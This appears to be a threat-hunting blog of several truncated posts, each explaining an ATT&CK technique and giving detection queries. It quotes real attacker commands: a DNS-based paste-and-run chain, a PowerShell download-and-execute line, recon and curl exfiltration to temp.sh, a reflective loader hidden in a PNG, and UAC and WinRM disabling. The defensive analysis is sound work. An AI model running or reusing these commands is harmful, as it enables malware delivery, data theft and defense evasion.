Know Your Adversary

Hello everyone! Variants of the Malicious Copy and Paste technique (T1204.004) continue to remain popular among attackers. Today, we’ll look at another example and examine whether it actually affects our detection capabilities. This particular variant was shared by researchers from Microsoft Threat Intelligence . The command that the victim is prompted to execute performs a DNS query to an attacker-controlled server and parses the Name: field from the response: cmd /c "nslookup example.com 84.21.189[.]20 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1 Despite the originality of the approach, the Name: field contains a fairly ordinary command: powershell.exe -ep bypass -w h -c "iwr hxxp://64.227.40[.]197/o -useb | iex" As you can see, there is nothing particularly novel here, and you could search for similar activity, for example, like this: event_type: "processcreatewin" AND...

Hello everyone! Today we’ll take a look at the Service Stop technique (T1489) and discuss whether it’s worth hunting for its implementation. This technique is a typical behavioral marker for ransomware and wipers. If you check ATT&CK , you’ll see plenty of examples. Typically, such malware is used at the very end of the cyberattack lifecycle and is hardly a good target for proactive threat hunting. However, there are always exceptions. Let’s take a look at the Prometei botnet. During the malware installation process, it stops the WinRM service and then disables it: sc stop WinRM sc config WinRM start= disabled Why is this done? For example, it makes remote administration more difficult. Could such activity be legitimate? Of course! Therefore, this behavioral marker can be a reasonable target for proactive hunting: event_type: "processcreatewin" AND proc_file_path: "sc.exe" AND cmdline: ("winrm" AND "disabled") See you soon!

Hello everyone! The abuse of legitimate cloud services keeps appearing in public cyber threat research reports, so today we’ll look at a couple of examples related both to malware distribution and data exfiltration. So, the first example we’ll look at is a loader from this report. In this case, the attackers abuse PowerShell to download an image containing malicious code from cloudinary[.]com : hxxps://res[.]cloudinary[.]com/dbjtzqp4q/image/upload/v1767455040/optimized_MSI_lpsd9p.jpg In this case, we can search for suspicious PowerShell interactions with cloudinary[.]com : event_type: "dnsreqwin" AND dns_rname: "cloudinary.com" AND proc_file_path: "powershell.exe" Another example is Muddled Libra . The attackers attempted to use several legitimate services for data exfiltration: upload[.]ee uploadnow[.]io filetransfer[.]io filebin[.]io Suspicious communications with these services can also be searched for: event_type: "dnsreq" AN...

Hello everyone! Today we’ll talk about a supply-chain attack related to Notepad++ and look at whether it was possible to detect the artifacts of compromise associated with it. Let’s take a look at the Kaspersky Lab report dedicated to this attack. The first thing that caught my attention is that, once again, the attackers executed a large number of commands to collect information about the compromised system, for example: cmd /c whoami >> a.txt cmd /c tasklist >> a.txt cmd /c systeminfo >> a.txt cmd /c netstat -ano >> a.txt Yes, hunting for this kind of behavioral markers will generate a lot of “noise,” but if you know your infrastructure well, they can absolutely be worked with: event_type: "processcreatewin" AND proc_p_file_path: "cmd.exe" AND cmdline: (*whoami* OR *tasklist* OR *systeminfo* OR *netstat*) Next, the attackers once again abused cURL, and this time they also used a rather suspicious web service - temp[.]sh : curl.exe -F ...

Hello everyone! Today we’ll look at another interesting example of implementing one of my favorite techniques for proactive hunting - Command and Scripting Interpreter: PowerShell (T1059.001) . This example is related to the distribution of the SHEETCREEP backdoor. The attackers distributed ZIP archives that contained two files: an LNK and a PNG. Opening the LNK file executed the following command: powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType(\"Task10.Program\")::MB())" The command reads bytes from the PNG file, reverses them, and loads them as a .NET assembly. What can we hunt for? For example, reading bytes with PowerShell from suspicious files, in particular PNG files (of course, you can extend this list): event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: (*ReadAllBytes* AND *png*) See yo...

Hello everyone! Today we’re going to look at another interesting example of the Modify Registry (T1112) technique, this time in the context of the Defense Evasion tactic. So, today’s example comes from an activity cluster known as KONNI . The malware used by the attacker modified the following registry parameter: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin This parameter defines how Windows requests confirmation for privilege elevation for administrators. Of course, the attackers change its value to “0”, which allows privilege elevation to occur without any confirmation. Therefore, it may be a good idea to look for suspicious events related to modification of this parameter: event_type: "registryvaluesetwin" AND reg_key_path: "consentpromptbehavioradmin" AND reg_value_data: "0x00000000" By the way, the report we’re discussing is yet another example of how attackers are abusing AI to develop malware and tools! ...